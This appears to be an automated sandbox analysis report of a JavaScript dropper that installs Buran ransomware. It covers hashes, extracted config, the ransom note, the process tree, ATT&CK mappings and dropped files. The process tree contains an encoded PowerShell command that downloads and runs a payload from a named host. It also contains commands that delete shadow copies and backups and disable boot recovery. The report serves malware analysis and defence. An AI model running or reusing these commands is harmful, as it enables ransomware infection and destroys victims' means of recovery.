Analysis

  • max time kernel
    150s
  • max time network
    142s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    11-08-2021 13:25

General

  • Target

    3346.js

  • Size

    530KB

  • MD5

    7e23a9a840725f3431ef5825c6ab6839

  • SHA1

    b9f307ac96ded5c42d931f7c4355756164ca0123

  • SHA256

    09eeec589e425f4da6dc1587e49f7f32c17f4c9e026b10c2360e5b3f72699ca7

  • SHA512

    51f027140d19f3b493d91a664d4c8bf2514b38c210f28178948a21d56fcde0ed99a068d7c0d04b9b3012ad03fc5be6e88d8e0f78aeb55bb919a2170a7e47da92

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://erzurum.us/65376345273497600381/tjTyjrjywrdmJoaaenvF/dll/assistant.php

Extracted

Path

C:\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT

Family

buran

Ransom Note
!!! ALL YOUR FILES ARE ENCRYPTED !!! All your files, documents, photos, databases and other important files are encrypted. You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files. To be sure we have the decryptor and it works you can send an email: kd8eby0@inboxhub.net and decrypt one file for free. But this file should be of not valuable! Do you really want to restore your files? Write to email: kd8eby0@inboxhub.net Reserved email: kd8eby0@onionmail.org Reserved email: kd8eby0@nuke.africa Your personal ID: 12B-343-43A Attention! * Do not rename encrypted files. * Do not try to decrypt your data using third party software, it may cause permanent data loss. * Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.
Emails

kd8eby0@onionmail.org

kd8eby0@nuke.africa

Signatures

  • Buran

    Ransomware-as-a-service based on the VegaLocker family first identified in 2019.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 3 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Interacts with shadow copies 2 TTPs 2 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 49 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\3346.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:568
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBlAHIAegB1AHIAdQBtAC4AdQBzAC8ANgA1ADMANwA2ADMANAA1ADIANwAzADQAOQA3ADYAMAAwADMAOAAxAC8AdABqAFQAeQBqAHIAagB5AHcAcgBkAG0ASgBvAGEAYQBlAG4AdgBGAC8AZABsAGwALwBhAHMAcwBpAHMAdABhAG4AdAAuAHAAaABwACIAKQA=
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2960
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBlAHIAegB1AHIAdQBtAC4AdQBzAC8ANgA1ADMANwA2ADMANAA1ADIANwAzADQAOQA3ADYAMAAwADMAOAAxAC8AdABqAFQAeQBqAHIAagB5AHcAcgBkAG0ASgBvAGEAYQBlAG4AdgBGAC8AZABsAGwALwBhAHMAcwBpAHMAdABhAG4AdAAuAHAAaABwACIAKQA=
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2764
        • C:\Users\Admin\AppData\Local\Temp\jbqvTZJz.exe
          "C:\Users\Admin\AppData\Local\Temp\jbqvTZJz.exe"
          4⤵
          • Executes dropped EXE
          • Adds Run key to start application
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3924
          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe
            "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe" -start
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Suspicious use of WriteProcessMemory
            PID:4040
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:1824
              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                wmic shadowcopy delete
                7⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:2976
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
              6⤵
                PID:3604
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
                6⤵
                  PID:1900
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
                  6⤵
                    PID:3732
                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe
                    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe" -agent 0
                    6⤵
                    • Executes dropped EXE
                    • Drops file in Program Files directory
                    PID:1148
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\system32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\~temp001.bat
                    6⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2832
                    • C:\Windows\SysWOW64\Wbem\WMIC.exe
                      wmic shadowcopy delete
                      7⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2892
                    • C:\Windows\SysWOW64\vssadmin.exe
                      vssadmin delete shadows /all /quiet
                      7⤵
                      • Interacts with shadow copies
                      PID:3272
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
                    6⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3032
                    • C:\Windows\SysWOW64\vssadmin.exe
                      vssadmin delete shadows /all /quiet
                      7⤵
                      • Interacts with shadow copies
                      PID:3124
                • C:\Windows\SysWOW64\notepad.exe
                  notepad.exe
                  5⤵
                    PID:3588
          • C:\Windows\system32\vssvc.exe
            C:\Windows\system32\vssvc.exe
            1⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2352

          Network

          MITRE ATT&CK Matrix ATT&CK v6

          Persistence

          Registry Run Keys / Startup Folder

          1
          T1060

          Defense Evasion

          File Deletion

          2
          T1107

          Modify Registry

          1
          T1112

          Discovery

          Query Registry

          1
          T1012

          Peripheral Device Discovery

          1
          T1120

          System Information Discovery

          2
          T1082

          Command and Control

          Web Service

          1
          T1102

          Impact

          Inhibit System Recovery

          2
          T1490

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3F26ED5DE6B4E859CCCA6035ECB8D9CB
            MD5

            3903600a51d4f986b4302a602d42634b

            SHA1

            0ffcdcba49bfe7ed35695bc6092d72eae2db457b

            SHA256

            b509c38c1328732e6b2cf75fe5baa76764a6c5aaea721da222b5caaaac4ecc8e

            SHA512

            459d03ff9961ebf926e591ed4fd08cfd0f5ec1518b16427ad7b2f1bdf5c6f2188b1f288dafcbcf4620a8a7c53ec4c995fc31cf1329bebf6dec7cc88ae33a7b4f

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\204C1AA6F6114E6A513754A2AB5760FA_0673414C08DE7F919AE3F6C4CC65AEEE
            MD5

            3c9ad8d57554c33ab612c69aef4ce7e1

            SHA1

            93f176d8825c9b8b70bb040079b4497457d04b82

            SHA256

            d21639d8e234be42f0db58da90ef5852064bd2b98f88c7c848d672bf8bbd1ece

            SHA512

            94791fcc6564db7929e2f3ea7c1c093872df24728561320e5341b9e8b7088e2b53a3c71e6e4bcd34663860a490875a7c285e9ba0990afb83388da9214af1362e

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
            MD5

            3e9f22cc690a8f0a85c77641e868fa63

            SHA1

            fe20510f5f24bdcf66183653b9b8b4f12581530c

            SHA256

            8f71c8b1d3dfc7997d945b8ffa1331874246cb0fc64f56eb2a25c9fa0b978ef9

            SHA512

            a96110ee91309ab8a15df7e5ecef220cfc2289180c54c789ceb148cc6a74c2c1339a3271267611ee963556d2c8c824d3274bcdb92c7476bb10a7553ade121e62

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3F26ED5DE6B4E859CCCA6035ECB8D9CB
            MD5

            5853495819c12953e611cca9d1df20a6

            SHA1

            c2ab03e520baca02509d13b874f98a11eccbf97a

            SHA256

            af4ad165f956d9f4b0b28fe3cf109d22e037152261bb132b01759abbfff193c4

            SHA512

            1e7b4a55632b53ceb18ab909df68fe8e21e4a3e50b6b4b7e44da3e662da2b6f1142ad2aa2e022f8efe0702fbaaf05eb8767df6dae76599973fa8b10f58e2be44

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\204C1AA6F6114E6A513754A2AB5760FA_0673414C08DE7F919AE3F6C4CC65AEEE
            MD5

            0e8dd2e802d289d7fad334886926dfe0

            SHA1

            3c7e37b0574f1af35590b516a5e1c85ef25ca6e3

            SHA256

            982c8039205a17211233ad08a1e271fa8370f263d0bcf633695e5ec7b139380d

            SHA512

            888d17cb6f3dd87cbaa9480a4846df9b7517ec9e29ba0a44c295760b8470221cd3ba9b77450252e83bb4a5001f6d7cda5ee842d895ee49b611a424bb96d59bf6

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
            MD5

            9773b0bfd3bc9fd0e830c05f6866c343

            SHA1

            8f49992bcf3e421e5fe988806cc3e0613a321e3a

            SHA256

            b730c7e0aac4cb57181ea00b923a96ad563f5fb5774f1f767eede0edfd5e6cbc

            SHA512

            1561825209673dcecd583105dd378417febeaa802737c622cdbdd05bd86a4d52c5ccc67595de3bb9437193b0becd9e5cb1a9406821dd4f92a2c8610bf31bc10f

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\DRMDU4BX\EEUV2G9N.htm
            MD5

            b1cd7c031debba3a5c77b39b6791c1a7

            SHA1

            e5d91e14e9c685b06f00e550d9e189deb2075f76

            SHA256

            57ba053f075e0b80f747f3102ed985687c16a8754d109e7c4d33633269a36aaa

            SHA512

            d2bbefdc1effb52a38964c4cec5990a5a226248eca36f99e446c0c5704436f666bf1cb514e73b8991411d497d3325ecc646cbd5065c364e92ab6b9c5f1ad4a72

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\ZIIA2USJ\YSR9BGOA.htm
            MD5

            8615e70875c2cc0b9db16027b9adf11d

            SHA1

            4ed62cf405311c0ff562a3c59334a15ddc4f1bf9

            SHA256

            da96949ba6b0567343f144486505c8c8fa1d892fd88c9cbc3ef3d751a570724d

            SHA512

            cd9dfc88dc2af9438b7d6b618d1b62029b3bdf739fc4daa5b37397afd12c4528561b3bf2fc3f3f2adf3fd1f582d5524332441fd30248fcd078e41aa91e17cb73

          • C:\Users\Admin\AppData\Local\Temp\jbqvTZJz.exe
            MD5

            de904e0d5b71c0c3d99430b61d40aae2

            SHA1

            5e1add3f70404f2110c389674e481484365eead4

            SHA256

            43812b98e4f9480d25b426a23a7b4d2a4e498110545c7a3cb21159bf75c18e7b

            SHA512

            25f086b82e86fcef30474d13e723980f43fccdd473b0e3f556b78b434494c2b22a3e3b765fbf2647aeb030e814a1eea1fdfe6d35e894449880780d6f3732d3f0

          • C:\Users\Admin\AppData\Local\Temp\jbqvTZJz.exe
            MD5

            de904e0d5b71c0c3d99430b61d40aae2

            SHA1

            5e1add3f70404f2110c389674e481484365eead4

            SHA256

            43812b98e4f9480d25b426a23a7b4d2a4e498110545c7a3cb21159bf75c18e7b

            SHA512

            25f086b82e86fcef30474d13e723980f43fccdd473b0e3f556b78b434494c2b22a3e3b765fbf2647aeb030e814a1eea1fdfe6d35e894449880780d6f3732d3f0

          • C:\Users\Admin\AppData\Local\Temp\~temp001.bat
            MD5

            ef572e2c7b1bbd57654b36e8dcfdc37a

            SHA1

            b84c4db6d0dfd415c289d0c8ae099aea4001e3b7

            SHA256

            e6e609db3f387f42bfd16dd9e5695ddc2b73d86ae12baf4f0dfc4edda4a96a64

            SHA512

            b8c014b242e8e8f42da37b75fe96c52cd25ebd366d0b5103bcba5ac041806d13142a62351edecdee583d494d2a120f9b330f6229b1b5fe820e1c7d98981089e9

          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe
            MD5

            de904e0d5b71c0c3d99430b61d40aae2

            SHA1

            5e1add3f70404f2110c389674e481484365eead4

            SHA256

            43812b98e4f9480d25b426a23a7b4d2a4e498110545c7a3cb21159bf75c18e7b

            SHA512

            25f086b82e86fcef30474d13e723980f43fccdd473b0e3f556b78b434494c2b22a3e3b765fbf2647aeb030e814a1eea1fdfe6d35e894449880780d6f3732d3f0

          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe
            MD5

            de904e0d5b71c0c3d99430b61d40aae2

            SHA1

            5e1add3f70404f2110c389674e481484365eead4

            SHA256

            43812b98e4f9480d25b426a23a7b4d2a4e498110545c7a3cb21159bf75c18e7b

            SHA512

            25f086b82e86fcef30474d13e723980f43fccdd473b0e3f556b78b434494c2b22a3e3b765fbf2647aeb030e814a1eea1fdfe6d35e894449880780d6f3732d3f0

          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe
            MD5

            de904e0d5b71c0c3d99430b61d40aae2

            SHA1

            5e1add3f70404f2110c389674e481484365eead4

            SHA256

            43812b98e4f9480d25b426a23a7b4d2a4e498110545c7a3cb21159bf75c18e7b

            SHA512

            25f086b82e86fcef30474d13e723980f43fccdd473b0e3f556b78b434494c2b22a3e3b765fbf2647aeb030e814a1eea1fdfe6d35e894449880780d6f3732d3f0

          • memory/1148-171-0x0000000000D00000-0x0000000000E44000-memory.dmp
            Filesize

            1.3MB

          • memory/1148-169-0x0000000000000000-mapping.dmp
          • memory/1824-163-0x0000000000000000-mapping.dmp
          • memory/1900-165-0x0000000000000000-mapping.dmp
          • memory/2764-120-0x00000278B04A0000-0x00000278B04A1000-memory.dmp
            Filesize

            4KB

          • memory/2764-132-0x00000278AEB20000-0x00000278AEB22000-memory.dmp
            Filesize

            8KB

          • memory/2764-133-0x00000278AEB23000-0x00000278AEB25000-memory.dmp
            Filesize

            8KB

          • memory/2764-126-0x00000278C94B0000-0x00000278C94B1000-memory.dmp
            Filesize

            4KB

          • memory/2764-134-0x00000278AEB26000-0x00000278AEB28000-memory.dmp
            Filesize

            8KB

          • memory/2764-115-0x0000000000000000-mapping.dmp
          • memory/2832-168-0x0000000000000000-mapping.dmp
          • memory/2892-174-0x0000000000000000-mapping.dmp
          • memory/2960-114-0x0000000000000000-mapping.dmp
          • memory/2976-175-0x0000000000000000-mapping.dmp
          • memory/3032-167-0x0000000000000000-mapping.dmp
          • memory/3124-173-0x0000000000000000-mapping.dmp
          • memory/3272-176-0x0000000000000000-mapping.dmp
          • memory/3588-162-0x0000000000BC0000-0x0000000000BC1000-memory.dmp
            Filesize

            4KB

          • memory/3588-152-0x0000000000000000-mapping.dmp
          • memory/3604-164-0x0000000000000000-mapping.dmp
          • memory/3732-166-0x0000000000000000-mapping.dmp
          • memory/3924-147-0x0000000000BB0000-0x0000000000CF4000-memory.dmp
            Filesize

            1.3MB

          • memory/3924-148-0x0000000000400000-0x000000000054B000-memory.dmp
            Filesize

            1.3MB

          • memory/3924-143-0x0000000000000000-mapping.dmp
          • memory/4040-161-0x0000000000E00000-0x0000000000F44000-memory.dmp
            Filesize

            1.3MB

          • memory/4040-149-0x0000000000000000-mapping.dmp